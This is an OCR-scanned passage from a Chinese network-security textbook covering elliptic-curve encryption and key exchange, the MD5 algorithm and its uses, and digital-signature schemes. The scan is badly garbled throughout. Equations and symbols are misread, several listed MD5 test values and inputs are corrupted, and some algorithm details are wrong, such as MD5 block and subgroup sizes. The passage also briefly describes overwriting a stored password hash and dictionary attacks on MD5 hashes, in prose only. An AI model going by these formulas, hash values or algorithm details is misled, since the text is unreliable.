点 。 根 据 定 义 , 该 点 为 零 元 ,计算 到 此 结束 。 

2.4.3 ”椭圆 曲线 加 密 解 密 


同 RSA 一 样 ,ECC 也 属于 非 对 称 公开 密 钥 算 法 。 

如 图 2-16 所 示 ,一 个 利用 椭圆 曲线 进行 加 密 通 信 的 过 程 如 下 : 

(1) 用 户 A 选 定 一 条 椭圆 曲线 E,(a,5) ,并 取 椭圆 曲线 上 一 点 ,作为 基点 P。 

(2) 用 户 A 选择 一 个 私有 密 钥 上 ,并 生成 公开 密 钥 K 二 &P。 

(3) 用 户 A 将 EE,(a,5b) 和 点 K,P 传 给 用 户 B。 

(4) 用 户 B 接 到 信息 后 ,将 待 传输 的 明文 编码 到 FE,(a,5) 上 一 点 M, 并 产生 一 个 随机 整 
数 rr 二 n)。 

(5) 用 户 B 计 算 点 C= 二 M+rK; Cs=rP。 

(6) 用 户 B 将 Cl .Cs 传 给 用 户 A。 

(7) 用 户 A 接 到 信息 后 ,计算 Ci 一 k Cs ,结果 就 是 点 M。 

因为 C 一 上 Cs 一 M+rK 一 ArP) 王 MT 十 rK 一 r(RP) 一 M, 再 对 点 M 进行 解码 就 可 以 得 
到 明文 。 














Alice 


Bab) K=kG 
Elab),K.G 


Ci=M+trk,Cy=rG 








ChNC> 





AMECI-kc 六 一 








图 2-16 椭圆 曲线 加 密 解密 

在 这 个 加 密 通信 中 ,如 果 有 一 个 偷窥 者 互 , 他 只 能 看 到 E, (a,5)、K、P、Ci、C, 而 通过 
K.P 求 k 或 通过 Cs,、P 求 r 都 是 计算 不 可 行 的 。 因 此 ,H 无 法 得 到 A、B 间 传 送 的 明文 
信息 。 

1. 表 文 消息 到 椭圆 曲线 上 的 榜 入 

在 使 用 椭圆 曲线 构造 密码 前 ,需要 将 明文 消息 镶嵌 到 椭圆 曲线 上 ,作为 椭圆 曲线 上 的 
点 。 设 明文 消息 是 m(0m 二 MD ,给 一 个 足够 大 的 整数 &, 假 如 取 &=30, 对 明文 消息 mm, 计 
算 一 系列 的 工 : z= 二 {mk 十 j ,j= 二 0,1,2,…} 二 {30m,30m 十 1,30m 十 2,…), 直 到 x? 十 az 十 65 


(mod 思 ) 是 平方 根 , 即 得 到 椭圆 曲线 上 的 点 VETazT5, 反 过 来 ,为 了 从 椭圆 曲线 上 的 点 
(zsy) 得 到 明文 消息 六 ,只 需要 计算 mm 一 图 。 


【 例 2-27】 设 椭圆 曲线 为 y==x? 十 3z,p 二 4177,m 二 2174, 则 z=={30X2174 十 j ,j= 二 0， 
1,2,…}。 当 1 一 15 时 ,z 一 30X2174 十 15 一 652 35,zs 十 3z 一 65 235; 十 3X65 235 一 1444 
mod 4177 二 38? ,所 以 得 到 椭圆 曲线 上 的 点 为 (65 235 ,38)。 


由 椭圆 曲线 上 的 点 (65 235,38) , 则 可 求 得 明文 信息 mm | 守 各 | | 2174.5 | 一 2174。 
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2. 椭圆 曲线 密 钥 交换 算法 

(1) 双方 协商 两 个 公开 的 参数 ,素数 域 GF(p) 上 的 椭圆 曲线 玉 和 基点 P。 

(2) A 选择 一 个 保密 的 随机 数 xz, 并 计算 出 zE[1,n 一 1],R1 二 zxXP。 

(3) B 选择 一 个 保密 的 随机 数 y, 并 计算 出 yE[1,n 一 1],R; 二 yxXP 

(4) A 将 Ri 发 送 给 B; B 将 R? 发 送 给 A。 

(5) A 计算 出 Ki 二 xzXR,; B 计 算出 K, 二 yXRi.,Ki、Ks 即 为 双方 协商 的 密 钥 。 
“KI=zrXR,=zX(yXP)=yX(xXP)=yXR=K; 

“Ki=K; 

【 例 2-28】 设 有 曲线 ,E's(1,6), 在 曲线 上 取 一 点 P(2,7), 求 A、.B 协商 的 公 钥 Q。 
解 : 取 A 的 随机 数 工 为 1,B 的 随机 数 > 为 7, 则 : 
Ri=zXP=1X(2,7)=(2,7), R;=yXP=7X(2,7)=(7,2) 
Ki=zxzXR,=1X(7,2)=(7,2), K,;=yXR=7X(2,7)=(7,2) 

“Kl 二 K;.….A.B 所 协商 的 公 钥 Q= Ki 王 K; 


2.5 数据 完整 性 认证 


数据 加 密 只 是 实现 了 密码 学 要 求 的 机 密 性 ,密码 学 还 同时 要 求 提供 其 他 方面 的 功能 : 
身份 认证 、 完 整 性 和 抗 抵 赖 性 。 这 些 功 能 是 人 类 通过 计算 机 进行 社会 交流 的 至 关 重要 的 

(1) 身份 认证 : 数据 的 接收 者 应 该 能 够 确认 数据 的 来 源 , 入 侵 者 不 可 能 伪装 成 他 人 。 

(2) 完整 性 : 数据 的 接收 者 应 该 能 够 验证 在 传送 过 程 中 数据 没有 被 修改 ,入 侵 者 不 可 
能 用 假 数据 代替 合法 数据 。 

(3) 抗 抵赖 性 : 发 送 数据 者 事后 不 可 能 虚假 地 否认 他 发 送 的 数据 。 

认证 的 目的 是 为 了 防止 传输 和 存储 的 数据 被 有 意 无 意 地 算 改 ,包括 数据 内 容 认 证 ( 即 数 
据 完 整 性 认证 ) ,数据 的 源 和 宿 认 证 ( 即 身份 认证 ) 及 操作 时 间 认 证 (即时 间 鹤 ) 等 。 它 在 税务 
的 金 税 系统 \ 银 行 的 支付 密码 器 等 票据 防伪 中 具有 重要 应 用 。 

数据 内 容 认 证 使 用 数据 摘要 方法 (如 MD5) 实 现 ; 身份 认证 是 识别 通信 对 方 的 身份 ,以 
防止 假冒 ,使 用 数字 签名 方法 实现 。 


2.5.1 MDS 算法 


消息 摘要 又 称 数字 摘要 (Digital Digest) 。 它 是 一 个 唯一 对 应 一 个 数据 的 固定 长 度 的 
值 , 它 由 一 个 单 向 Hash 函数 对 数据 进行 作用 而 产生 。 如 果 数 据 在 途中 改变 了 , 则 接收 者 通 
过 对 收 到 数据 的 新 产生 的 摘要 与 原 摘要 比较 ,就 可 知道 数据 是 否 被 改变 了 。 因 此 数据 摘要 
保证 了 数据 的 完整 性 。 

最 常用 的 单 向 Hash 算法 是 MD5 ,全 称 是 Message Digest Algorithm 5( 数 据 摘要 算法 
5) ,MD5 是 经 MD2、MD3 和 MD4 发 展 而 来 。MD5 算法 的 使 用 不 需要 支付 任何 版 权 费 用 ， 
可 用 于 提供 数据 的 完整 性 保护 ,确保 信息 传输 完整 一 致 
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MD5 具有 以 下 特征 : 

(1) 唯一 性 。 单 向 Hash 函数 将 需 加 密 的 明文 摘要 成 一 串 128 位 的 密 文 。 它 有 固定 的 
长 度 , 且 不 同 的 明文 摘要 成 密 文 ,其 结果 总 是 不 同 的 ,输入 的 微小 变化 将 导致 输出 的 巨大 变 
化 ( 称 为 雪崩 效应 ) ,同样 的 明文 其 摘要 必定 一 致 。 这 样 摘要 便 可 成 为 验证 明文 是 否 是 在 传 
输 、 存 储 过 程 中 发 生 改变 的 “指纹 ”。 

任何 人 都 有 自己 独一无二 的 “指纹 ”, 这 常常 成 为 公安 机 关上 鉴别 罪犯 身份 最 值得 信赖 的 
方法 ; 与 之 类 似 ,MD5 可 以 为 任何 信息 (不 管 其 大 小 、 格 式 、 数 量 ) 产 生 一 个 独一无二 的 MD5 
值 ,如 果 任 何人 对 信息 做 了 任何 改动 ,其 MD5 值 都 会 发 生变 化 ,从 而 实现 数据 完整 性 检测 。 
因此 MD5 值 也 称 为 信息 或 文件 的 数字 指纹 (Digital Finger Print) 。 

(2) 单 向 性 。 根据 128 位 的 输出 结果 不 可 能 反 推 出 输入 的 信息 (不 可 逆 , 单 向 性 ); 
MD5 将 任意 长 度 的 字 节 串 映射 为 一 个 128 位 的 大 整数 ,并 且 通 过 该 128 位 整数 反 推 原始 字 
符 串 是 困难 的 , 换 句 话说 就 是 ,即使 你 看 到 源 程序 和 算法 描述 ,也 无 法 将 一 个 MD5 的 值 变 
换 回 原始 的 字符 串 ,从 数学 原理 上 说 ,是 因为 原始 的 字符 串 有 无 穷 多 个 ,这 有 点 像 不 存在 反 
函数 的 数学 函数 。 

(3) 结果 定 长 。 输 入 任意 长 度 的 信息 ,经 过 处 理 后 均 输 出 128 位 的 MD5 值 , 易 于 处 理 。 
例如 : 

MD5 ("") = d41d8cd98f00b204e9800998ecf8427e 

MD5 ("a") = Occ175b9cOflb6a831c399e269772661 

MD5 ("abe") = 900150983cd24fb0d6963f7d28e17f72 

MD5 ("message digest") = f96b697d7cb7938d525a2f31aafl61d0 

MD5 ("abcdefghijjklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67el3b 

MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz") 一 

f29939a25efabaef3b87e2cbfe641315 

对 于 特定 的 文件 而 言 ,数据 摘要 是 唯一 的 。 数 据 摘要 可 以 被 公开 , 它 不 会 透露 相应 文件 
的 任何 内 容 。 

MD5 的 作用 是 让 大 容量 数据 在 用 数字 签名 软件 签署 私人 密 钥 前 被 压缩 成 一 种 保密 的 
格式 (就 是 把 一 个 任意 长 度 的 字 节 串 变换 成 一 定 长 的 十 六 进 制 数字 符 串 )。 除 了 MD5 以 
外 ,比较 有 名 的 还 有 sha-1、RIPEMD 以 及 Haval 等 。 

MD5 算法 以 512 位 分 组 作为 输入 的 信息 , 且 每 一 分 组 又 被 划分 为 16 个 32 位 子 分 组 ， 
经 过 了 一 系列 的 处 理 后 ,算法 的 输出 结果 由 4 个 32 位 分 组 组 成 ,将 这 4 个 32 位 子 分 组 级 联 
后 将 生成 一 个 128 位 散 列 值 ( 即 128 位 的 数据 摘要 ) 。 

总 体 流程 为 : 

(1) 填充 。 如 果 输 入 信息 的 长 度 对 512 求 余 的 结果 不 等 于 448, 就 需要 填充 使 得 对 512 
求 余 的 结果 等 于 448。 填 充 的 方法 是 填充 1 个 1 和 个 0。 填 充 完 后 ,信息 的 长 度 就 为 nX 
512 十 448( 位 ) ,7 为 一 个 非 负 整数 ,可 以 是 零 ; 

(2) 记录 信息 长 度 。 用 64 位 来 存储 填充 前 信息 长 度 。 这 64 位 加 在 第 一 步 结果 的 后 
面 ,这 样 信息 长 度 就 变 为 nX512 十 448 十 64 二 (n 十 1)X512 位。 

(3) 装 入 标准 的 幻 数 (4 个 整数 ): A = 二 (01234567)16, B= (89ABCDEF)w,C= 
(FEDCBA98)16.,D 二 (76543210)1。 。 如 果 在 程序 中 定义 应 该 是 (A 二 0X67452301L, B= 
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0XEFCDAB89L,C 一 0X98BADCFEL,D 一 0X10325476L) 。 

(4) 4 轮 循 环 运算 : 循环 的 次 数 是 分 组 的 个 数 (n 十 1)。 

Q@ 将 每 一 512 字 节 细 分 成 16 个 小 组 ,每 个 小 组 64 位 (8 个 字 节 )。 

@ 先 认识 4 个 线性 函数 (& 是 与 ,| 是 或 ,一 是 非 ,^ 是 异 或 ) 。 

F(X,Y,Z)==(X&Y)|((~~X)&2Z),F 是 一 个 逐 位 运算 的 函数 。 即 ,如 果 义 ,那么 Y, 否 
则 Z。 

G(X,Y,2)=(X&Z2)| (YE& (~2)) 

HH(X,Y,2Z) 二 X^Y ^Z, 函 数 日 是 逐 位 奇偶 操作 符 。 

.G0 dd dp, 

这 4 个 函数 的 说 明 : 如 果 XX、Y、Z 的 对 应 位 是 独立 和 均匀 的 ,那么 结果 的 每 一 位 也 应 是 
独立 和 均匀 的 。 

@ 设 Mi 表示 数据 的 第 j 个 子 分 组 (从 0 一 15) ,一 * 表示 循环 左 移 * 位 ,4 种 操作 为 : 

FF(a,b,c,d ,Mj,ssti) 表 示 a==6b 十 ((a 十 Fl(b,c,d) 二 Mj 二 ti) 过 s) 

GG(a,bs,crd ,Mj，s,ti) 表 示 a=b+((at+G(b,c,d)i+M;j +t)=s) 

HH(a,bscyd,Mj ,ssti) 表 示 a=b 十 ((a 十 H(b,csd) 十 Mj 二 4t;) 达 s) 

I1(a,bycyd,Mj,ssti 表示 a 二 b 十 (Ca 十 1(bsc,d) 二 Mj 二 ti;) 过 s) 

假设 Mi 表示 数据 的 第 j 个 子 分 组 (从 0 一 15) ,常数 4 是 4294 967 296Xabs(sin(i)) 的 
整数 部 分 ,i 取 值 从 1 一 64, 单 位 是 弧度 (4 294 967 296 等 于 22 ) 。 

第 一 分 组 需要 将 上 面 4 个 幻 数 复制 到 另外 4 个 变量 中 : A 到 a.B 到 5,C 到 c,D 到 4d。 
从 第 二 分 组 开始 的 变量 为 上 一 分 组 的 运算 结果 。 

主 循环 有 4 轮 , 每 轮 循环 都 很 相似 。 第 一 轮 进行 16 次 操作 。 每 次 操作 对 co.c、d 中 的 
其 中 3 个 作 一 次 非 线 性 函数 运算 ,然后 将 所 得 结果 加 上 第 四 个 变量 。 

所 有 这 些 完成 之 后 ,将 A、B、C、D 分 别 加 上 a、b、c.d, 然 后 用 下 一 分 组 数据 继续 运行 算 
法 ,最 后 的 输出 是 A、B、C、D 的 级 联 。 

MD5 算法 的 优势 在 于 使 用 不 需要 支付 任何 版 权 费 用 ,所 以 在 非 绝 密 应 用 领域 应 用 广 
泛 。2004 年 8 月 17 日 ,我 国 的 王小云 院士 破译 MD5、HAVAL-128、MD4 和 RIPEMD 算 
法 ,公布 了 MD 系列 算法 的 破解 结果 。 

这 种 破解 并 非 是 真正 的 破解 ,只 是 加 速 了 杂凑 冲撞 。 杂 凑 冲 撞 是 指 两 个 完全 不 同 的 数 

据 经 杂凑 函数 计算 得 出 完全 相同 的 杂凑 值 。 根 据 铀 巢 原 理 , 以 有 长 度 限 制 的 杂凑 函数 计算 
没有 长 度 限制 的 数据 必然 会 有 冲撞 情况 出 现 。 一 直 以 来 ,专家 都 认为 要 任意 制造 出 冲撞 需 
要 太 长 时 间 ,在 实际 情况 中 不 可 能 发 生 ,而 王小云 等 的 发 现 打 破 了 这 个 必然 性 。2009 年 , 汉 
登 国 院士 . 谢 涛 二 人 利用 差分 攻击 ,将 MD5 的 碰撞 算法 复杂 度 从 王小云 的 22 进一步 降低 到 
22 ,极端 情况 下 甚至 可 以 降低 至 2" 。22 的 复杂 度 意 味 着 在 目前 计算 机 上 ,只 要 几 秒 便 可 以 
找到 一 对 碰撞 。 

王小云 院士 的 研究 成 果 具 有 重要 意义 。 它 表明 从 理论 上 讲 电子 签名 可 以 伪造 ,必须 及 
时 添加 限制 条 件 ,或 者 重新 选用 更 为 安全 的 密码 标准 ,以 保证 电子 商务 的 安全 。 








2.5.2 MDS 应 用 
数据 内 容 认证 时 ,采用 数据 摘要 函数 计算 数据 摘要 ,将 数据 摘要 用 发 送 方 的 私 钥 加 密 后 


70 网 络 安 全 教程 与 实践 (第 2 版 ) 





和 原 数据 一 起 发 送 至 目的 端 ,目的 端 通过 执行 相应 操作 ,就 可 实现 数据 认证 。 

1. 完整 性 验证 (一 致 性 验证 ) 

典型 应 用 是 发 送 一 个 文件 前 , 先 计算 其 MD5 的 输出 结果 a, 将 a 附加 在 文件 后 面 发 送 ; 
对 方 收 到 文件 后 ,重新 计算 其 MD5 的 输出 结果 02; 如 果 a 与 2 一 样 ,就 代表 文件 在 传输 中 途 
未 被 自 改 。 这 样 ,一 旦 这 个 文件 在 传输 过 程 中 ,其 内 容 被 损坏 或 者 被 修改 ,那么 这 个 文件 的 
MD5 值 就 会 发 生变 化 ,通过 对 文件 MD5 的 验证 ,可 以 得 知 获得 的 文件 是 否 完整 。 

UNIX, 软 件 下 载 的 时 候 都 有 一 个 文件 名 相同 ,文件 扩展 名 为 . md5 的 文件 ,在 这 个 文件 
中 通常 只 有 一 行文 本 ,例如 MD5 (tanajiya. tar. gz) 一 0cal75b9c0f726a831d895e269332461 。 
这 就 是 tanajiya. tar. gz 文件 的 数字 签名 。MD5 将 整个 文件 当 作 一 个 大 文本 信息 ,通过 其 不 
可 道 的 字符 串 变 换算 法 ,产生 了 这 个 唯一 的 MD5 数据 摘要 。 它 的 作用 就 在 于 我 们 可 以 在 
下 载 该 软件 后 ,对 下 载 回 来 的 文件 用 专门 的 软件 (如 Windows MD5 Check 等 ) 做 一 次 MD5 
校 验 ,以 确保 我 们 获得 的 文件 与 该 站 点 提供 的 文件 为 同一 文件 。 

在 网 上 下 载 软件 时 ,为 了 防止 不 法 分 子 在 软件 中 添加 木马 ,应 在 网 站 上 公布 由 软件 得 到 
的 MD5 值 供 下 载 用 户 验 证 软件 的 完整 性 。 

2. 安全 访问 认证 

MD5 广泛 用 于 操作 系统 (UNIX、 各 类 BSD 系统 ) 的 登录 认证 上 。 在 UNIX 系统 中 ,用 
户 的 密码 是 以 MD5( 或 其 他 类 似 的 算法 ) 运 算 后 存储 在 文件 系统 中 的 。 当 用 户 登 录 时 ,系统 
把 用 户 输入 的 密码 进行 MD5 运算 ,然后 再 去 和 保存 在 文件 系统 中 的 MD5 值 进 行 比较 , 进 
而 确定 输入 的 密码 是 否 正确 。 通 过 这 样 的 步骤 ,系统 在 并 不 知道 用 户 密码 明文 的 情况 下 就 
可 以 确定 用 户 登 录 系 统 的 合法 性 。 这 可 以 避免 用 户 的 密码 被 具有 系统 管理 员 权 限 的 用 户 知 
道 , 而 且 还 在 一 定 程度 上 增加 了 破解 密码 的 难度 。 这 种 加 密 技 术 被 广泛 的 应 用 于 UNIX 系 
统 中 ,这 也 是 为 什么 UNIX 系统 比 一 般 操 作 系统 更 为 安全 的 一 个 重要 原因 。 

现在 很 多 网 站 在 数据 库存 储 用 户 的 密码 的 时 候 都 是 存储 用 户 密码 的 MD5 值 。 这 样 就 
算 不 法 分 子 得 到 数据 库 用 户 密码 的 MD5 值 ,也 无 法 知道 用 户 密码 。 

MD5 密码 如 何 破解 ? 比较 有 效 的 办 法 是 使 用 系统 中 的 md5() 函数 重新 设 一 个 密码 ,如 
admin, 把 生成 的 一 串 密 码 的 Hash 值 覆 盖 原 来 的 Hash 值 就 行 了 。 

正 是 因为 这 个 原因 ,现在 被 黑客 使 用 最 多 的 破译 密码 的 方法 就 是 一 种 被 称 为 跑 字 典 的 
方法 。 先 用 MD5 程序 计算 出 这 些 字典 项 的 MD5 值 , 然 后 再 用 目标 的 MD5 值 在 这 个 字典 
中 检索 。 有 两 种 方法 得 到 字典 : 一 种 是 搜集 用 作 密 码 的 字符 串 表 , 另 一 种 是 用 排列 组 合 方 
法 生成 。 假 设 密码 的 最 大 长 度 为 8 字 节 (8 Bytes) ,同时 密码 只 能 是 字母 和 数字 , 共 26 十 
26 十 10 王 62 个 字符 ,排列 组 合 出 的 字典 的 项 数 则 是 P(62,1) 十 P(62,2) 十 … 十 P(62.8) ,已 
经 是 一 个 很 天 文 的 数字 了 ,存储 这 个 字典 就 需要 TB 级 的 磁盘 阵列 ,而 且 这 种 方法 还 有 一 个 
前 提 , 就 是 能 获得 目标 账户 的 密码 MD5 值 的 情况 下 才 可 以 。 因 此 直接 使 用 这 种 方法 的 效 
率 不 高 。 

3. 数据 内 容 认 证 

数据 内 容 认证 常用 的 方法 : 发 送 者 在 数据 中 加 入 一 个 鉴别 码 并 经 加 密 后 发 送 给 接收 
者 ,接收 者 利用 约定 的 算法 对 解密 后 的 数据 进行 鉴别 运算 重新 计算 鉴别 码 , 将 得 到 的 鉴别 码 
与 收 到 的 鉴别 码 进行 比较 ,车 二 者 相等 则 接收 ,否则 拒绝 接收 。 
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相对 于 密码 系统 ,认证 系统 更 强调 的 是 完整 性 。 消 息 由 发 送 者 发 出 后 ,经 由 密 钥 控制 或 
无 密 钥 控 制 的 认证 编码 器 变换 ,加 入 认证 码 , 将 数据 连同 认证 码 一 起 在 公开 的 无 扰 信 道 进行 
传输 ,有 密 钥 控制 时 还 需要 将 密 钥 通过 一 个 安全 信道 传输 至 接收 方 。 接 收 方 在 收 到 所 有 数 
据 后 ,经 由 密 钥 控制 或 无 密 钥 控制 的 认证 译 码 器 进行 认证 ,判定 数据 是 否 完整 。 

数据 在 整个 过 程 中 以 明文 形式 或 某 种 变形 方式 进行 传输 ,不 要 求 加 密 ,也 不 要 求 内 容 对 
第 三 方 保 密 。 

攻击 者 能 够 截获 和 分 析 信道 中 传送 的 数据 内 容 , 而 且 可 能 伪造 数据 送 给 接收 者 进行 其 
诈 。 攻 击 者 不 再 像 保密 系统 中 的 密码 分 析 者 那样 始终 处 于 消极 被 动 地 位 ,而 是 主动 攻击 者 。 

在 数据 认证 中 ,数据 源 和 宿 的 常用 认证 方法 有 两 种 : 

(1) 通信 双方 事先 约定 发 送 数据 的 数据 加 密 密 钥 ,接收 者 只 需要 证 实 发 送 来 的 数据 是 
否 能 用 该 密 钥 还 原 成 明文 就 能 鉴别 发 送 者 。 如 果 双 方 使 用 同一 个 数据 加 密 密 钥 ,那么 只 需 
在 数据 中 嵌入 发 送 者 识别 符 即 可 。 

(2) 通信 双方 事先 约定 各 自发 送 数 据 所 使 用 的 通行 字 , 发 送 数据 中 含有 此 通行 字 并 进 
行 加 密 ,接收 者 只 需 判别 数 据 中 解密 的 通行 字 是 否 等 于 约定 的 通行 字 就 能 鉴别 发 送 者 。 为 
了 安全 起 见 ,通行 字 应 该 是 可 变 的 。 

数据 认证 中 常见 的 攻击 和 对 策 。 

(1) 重 放 攻击 : 截获 以 前 协议 执行 时 传输 的 信息 ,然后 在 某 个 时 候 再 次 使 用 。 对 付 这 
种 攻击 的 一 种 措施 是 在 认证 数据 中 包含 一 个 非 重 复 值 ,如 序列 号 .时 难 、. 随 机 数 或 嵌入 目标 
身份 的 标志 符 等 。 

(2) 冒充 攻击 : 攻击 者 冒充 合法 用 户 发 布 虚 假 数据 。 为 避免 这 种 攻击 可 采用 身份 认证 
技术 。 

(3) 重组 攻击 : 把 以 前 协议 执行 时 一 次 或 多 次 传输 的 信息 重新 组 合 进行 攻击 。 为 了 避 
免 这 类 攻击 ,把 协议 运行 中 的 所 有 数据 都 连接 在 一 起 。 

(4) 算 改 攻击 : 修改 、 删 除 、 添 加 或 替换 真实 的 数据 。 为 避免 这 种 攻击 ,可 采用 数据 认 
证 码 MAC 或 Hash 函数 等 技术 。 


2.6 数字 签名 


2.6.1 数字 签名 定义 


在 计算 机 通信 中 , 当 接 收 者 接收 到 数据 时 ,往往 需要 验证 数据 在 传输 过 程 中 有 没有 被 算 
改 ; 有 时 接收 者 需要 确认 数据 发 送 者 的 身份 。 所 有 这 些 都 可 以 通过 数字 签名 来 实现 。 

数字 签名 是 公开 密 钥 加 密 技 术 的 一 种 应 用 。 其 使 用 方式 是 : 报 文 的 发 送 方 从 报 文 文本 
中 生成 一 个 128 位 的 散 列 值 ( 即 Hash 函数 值 ,有 时 这 个 单 向 值 也 叫做 报 文摘 要 ,与 报 文 的 
数字 指纹 或 标准 校 验 相 似 ) 来 验证 发 送 报 文 的 完整 性 和 不 可 抵赖 性 。 

数字 签名 可 以 用 来 证 明 数 据 确实 是 由 发 送 者 签发 的 ,而 且 当 数字 签名 用 于 存储 的 数据 
或 程序 时 ,可 以 用 来 验证 数据 或 程序 的 完整 性 。 它 和 传统 的 手写 签名 类 似 ,应 满足 以 下 
条 件 。 

。 签名 是 可 以 被 确认 的 , 即 接收 方 可 以 确认 或 证 实 签名 确实 是 由 发 送 方 签名 的 。 
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。 签名 是 不 可 伪造 的 , 即 接收 方 和 第 三 方 都 不 能 伪造 签名 。 

。 签名 不 可 重用 , 即 签名 是 数据 (数据 文件 ) 的 一 部 分 ,不 能 把 签名 移 到 其 他 数据 上 。 

。 签名 是 不 可 抵赖 的 , 即 发 送 方 不 能 否认 他 所 签发 的 数据 。 

。 第 三 方 可 以 确认 收发 双方 之 间 的 数据 传送 但 不 能 自 改 数据 。 

1. 基于 密 钥 的 数字 签名 

使 用 对 称 密码 系统 可 以 对 文件 进行 签名 ,但 此 时 需要 可 信任 的 第 三 方 仲裁 。 设 CA 是 
A 和 了 共同 依赖 的 仲裁 人 。KA 和 Ks 分 别 是 A 和 了 与 CA 之 间 的 密 钥 ,而 Kes 是 只 有 CA 
掌握 的 密 钥 ,已 是 A 发 给 B 的 数据 ,t 是 时 间 戳 。CA 解读 了 A 的 报 文 {A,Ka(B,t,P)} 以 
后 产生 了 一 个 签名 的 数据 Kea(A,t,P), 并 装配 成 发 给 B 的 报 文 {Ks(A,t,P,Kca(A,t, 
P))}。B 可 以 解读 该 报 文 ,阅读 数据 已 ,并 保留 Kea (A,i,P)。 

由 于 A 和 B 之 间 的 通信 和 是 通过 中 间 人 CA 的 ,所 以 不 必 怀 疑 对 方 的 身份 。 又 由 于 证 据 
Kca(A,t,P) 的 存在 ,A 不 能 否认 发 送 过 数据 P.B 也 不 能 改变 得 到 的 数据 已, 因为 CA 仲裁 
时 可 能 会 当场 解密 Kca (A ,t,P) ,得 到 发 送 人 、 发 送 时 间 和 原来 的 数据 P。 

2. 基于 公 钥 的 数字 签名 

利用 公 钥 加 密 算 法 的 数字 签名 系统 如 图 2-17 所 示 。 如 果 A 否认 了 ,B 可 以 拿 出 DACP)， 
并 用 A 的 公 钥 EA 解密 得 到 已 ,从 而 证 明 书 是 A 发 送 的 。 如 果 B 把 数据 算 改 了 , 当 A 要 求 
B 出 示 原 来 的 Da(P) 时 ,B 拿 不 出 来 。 














发 送 方 接收 方 
2 A 的 私 钥 DA 人 B 的 公 钥 Es et B 的 私 钥 De es A 的 公 钥 Eh je 
DA(P) Es(DA(P)) Da(P) 


图 2-17 基于 公 钥 的 数字 签名 


在 实际 应 用 中 ,由 于 公开 密 钥 算法 的 效率 较 低 ,发送 方 并 不 对 整个 文件 签名 ,而 只 对 文 
件 的 Hash 值 签 名 。 

3. 直接 方式 的 数字 签名 技术 

直接 方式 的 数字 签名 只 有 通信 双方 参与 ,并 假定 接收 方 知道 发 送 方 的 公开 密 钥 。 数 字 
签名 的 形成 方式 可 以 用 发 送 方 的 密 钥 加 密 整 个 数据 。 

如 果 发 送 方 用 接收 方 的 公开 密 钥 ( 公 钥 加 密 体 制 ) 或 收发 双方 共享 的 会 话 密 钥 ( 密 钥 加 
密 体 制 ) 对 整个 数据 及 其 签名 进一步 加 密 ,那么 对 数据 及 其 签名 提供 了 更 高 保密 性 。 而 此 时 
的 外 部 保密 方式 ( 即 数字 签名 是 直接 对 需要 签名 的 数据 生成 而 不 是 对 已 加 密 的 数据 生成 , 否 
则 称 为 内 部 保密 方式 ) 则 对 解决 争议 十 分 重要 ,因为 在 第 三 方 处 理 争议 时 ,需要 得 到 明文 数 
据 及 其 签名 才 行 。 但 如 果 采 用 内 部 保密 方式 ,那么 ,第 三 方 必须 在 得 到 数据 的 解密 密 钥 后 才 
能 得 到 明文 数据 。 如 果 采 用 外 部 保密 方式 ,那么 ,接收 方 就 可 将 明文 数据 及 其 数字 签名 存储 
下 来 以 备 之 后 可 能 出 现 的 争议 时 使 用 。 

直接 方式 的 数字 签名 有 一 个 弱点 , 即 方案 的 有 效 性 取决 于 发 送 方 密 钥 的 安全 性 。 如 果 
发 送 方 想 对 自己 已 发 出 的 数据 予以 否认 ,就 可 声称 自己 的 密 钥 已 丢失 被 盗 , 认 为 自己 的 签名 
是 他 人 伪造 的 。 对 这 一 弱点 可 采取 某 些 行政 手段 ,在 某 种 程度 上 可 减弱 这 种 威胁 ,如 要 求 每 
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一 个 被 签名 的 数据 都 包含 有 一 个 时 间 戳 (日 期 和 时 间 ) ,并 要 求 密 钥 丢 失 后 立即 向 管理 机 构 
报告 。 这 种 方式 数字 签名 还 存在 发 送 方 的 密 钥 真 的 被 偷 的 危险 ,例如 , 敌 方 在 时 刻 了 获得 
发 送 方 的 密 钥 ,然后 可 伪造 一 个 数据 ,用 偷 得 的 密 钥 为 其 签名 并 加 上 T 以 前 的 时 刻 作为 时 
间 戳 。 

4. 安全 Hash 函数 

通过 单 向 Hash 函数 生成 数字 摘要 ,并 用 单 向 检验 和 函数 CK 对 其 作用 ,计算 出 CK(MD， 
发 送 者 把 这 一 CK(M) 和 原 数 据 一 起 发 送 到 目的 方 。 其 实现 过 程 总 结 如 下 : 

(1) 被 发 送 明 文 先 用 MD5 方式 产生 128 位 的 数字 摘要 ; 

(2) 发 送 方 用 自己 的 私有 密 钥 对 摘要 加 密 ,形成 “数字 签名 ”; 

(3) 将 原文 m 和 加 密 的 摘要 同时 传 给 对 方 ; 

(4) 接收 方 用 发 送 方 的 公 钥 对 摘要 进行 解密 ,同时 对 接收 到 的 文件 用 MD5 编码 重新 产 
生 摘 要 ; 

(5) 接收 方 将 解码 后 的 摘要 和 收 到 的 原 明文 重新 用 MD5 加 密 产 生 的 摘要 进行 对 比 ,如 
果 两 者 一 致 , 则 明文 信息 在 传递 过 程 中 没有 被 破坏 或 算 改 。 

采用 公 钥 密码 体制 和 单 向 Hash 函数 进行 数字 签名 的 具体 过 程 如 图 2-18 所 示 。 

A 





信息 摘要 签名 
h K 
Me Hh | Ku sh 


KA( 随 机 产生 的 加 密 钥 ) 

































































KA 公 解密 
HA 
不 同 
人 被 修改 
所 |- 一- 华 较 
相同 
未 被 修改 B 


图 2-18 采用 公 钥 密码 体制 和 单 向 Hash 函数 进行 的 数字 签名 过 程 


(1) 将 发 送 的 信息 M 经 过 Hash 运算 产生 信息 M 的 数据 摘要 及, 将 该 数据 摘要 经 过 
A 的 私 钥 人 加 密 后 产生 A 的 签名 SA; 

(2) 将 A 要 发 送 的 信息 用 A 随机 产生 的 对 称 密 钥 Ks 进行 加 密 , 产 生 密 文 CA; 将 A 随 
机 产生 的 密 钥 Ks 用 B 的 公 钥 Kss 进行 加 密 , 得 到 加 密 的 密 钥 Cx; 

(3) 用 户 A 将 签名 SA、 密 文 Cs 和 加 密 后 的 密 钥 CrA 发 送 给 B。 

(4) 用 户 B 收 到 这 些 信息 后 , 先 用 B 的 私 钥 Ks 将 发 送 过 来 的 加 密 密 钥 CrA 解 密 后 得 
到 密 钥 Ka; 

(5) 用 该 密 钥 解密 密 文 CA 得 到 信息 明文 M; 对 明文 信息 M 计算 其 数据 摘要 得 到 摘要 
